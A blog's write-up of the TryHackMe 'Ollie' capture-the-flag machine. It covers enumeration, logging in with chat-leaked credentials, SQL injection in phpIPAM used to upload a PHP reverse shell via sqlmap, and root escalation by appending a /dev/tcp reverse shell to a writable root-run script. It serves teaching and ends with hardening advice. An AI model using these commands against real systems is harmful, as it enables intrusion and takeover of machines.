d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-ollie-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

160 lines
5.5 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - Ollie (THM)"
date: 2022-04-22
slug: "writeup-ollie-thm"
type: "writeup-ctf"
---
This is a writeup for the [Ollie](https://tryhackme.com/room/ollie) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.147.194
```
Three TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 8.2p1)
- 80/tcp : HTTP web server (Apache 2.4.41)
- 1337/tcp : Chat and file  sharing (waste)
![](img/image-2.webp)
## Exploit
First of all I connect via netcat to the waste port to see if I can get some information.
```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ nc 10.10.147.194 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name? azerty
What's up, Azerty! It's been a while. What are you here for? test
Ya' know what? Azerty. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
Username: admin
Password: OllieUnixMontgomery!
PS: Good luck and next time bring some treats!
```
After some tests, I find that the chat returns credencials for an admin panel. If I go to the port 80 site, I find a login page, so I test the credencials and it works!
![](img/image-3.webp)
This is an administration page based on `phpIPAM 1.4` after some research I find the following exploit : [exploit](https://fluidattacks.com/advisories/mercury/). I try to apply it to see if it works.
![](img/image-4.webp)
After following the different steps, the exploit works, so we can now perform SQL injections! To automate the upload process of a php reverse shell I will use `sqlmap`. I start by extracting a query with Burp :
```bash
POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
Host: 10.10.196.154
Content-Length: 20
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Sa>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.196.154
Referer: http://10.10.196.154/index.php?page=tools&section=routing&subnetId=bgp&sPage=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpipamredirect=%2Findex.php%3Fpage%3Dtools%26section%3Drouting%26subnetId%3Dbgp%26sPage%3D2; phpipam=151l3>
Connection: close
subnet=test&bgp_id=2
```
Then with the following command I send my php file :
```bash
sqlmap -r request.txt --file-write=reverse.php --file-dest=/var/www/html/reverse.php --batch
```
![](img/image-5.webp)
After running netcat I can access the file and create a reverse shell.
![](img/image-6.webp)
After some research I find that a user folder: `ollie`. So I try to change the user with the password I found before:
![](img/image-7.webp)
I can now recover the first flag.
```bash
ollie@hackerdog:~$ cat user.txt
cat user.txt
THM{Ollie_boi_is_daH_Cut3st}
```
## Privilege escalation
I start by running [linpeas.sh](https://linpeas.sh) but I don't find anything interesting. So I try to list the services with [pspy64](https://github.com/DominicBreuker/pspy).
```bash
ollie@hackerdog:~$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
[...]
2022/04/13 10:11:43 CMD: UID=0 PID=1355 | python3 -u olliebot.py
[...]
2022/04/13 10:12:04 CMD: UID=0 PID=37813 | /bin/bash /usr/bin/feedme
[...]
```
In the result of the command I see 2 interesting services executed by the UID=0 i.e. root. The second one is a bash script but without any particular content. But I have write permission.
![](img/image-8.webp)
So I add a reverse shell in the file with the following command:
```bash
echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> /usr/bin/feedme
```
Then after a few seconds, I have a reverse shell root and I can recover the last flag.
![](img/image-9.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not put credentials in a public chat
- Do not use the same password for a session and a web service
- Do not allow scripts executed by root to be writable by other users
Reference in New Issue View Git Blame Copy Permalink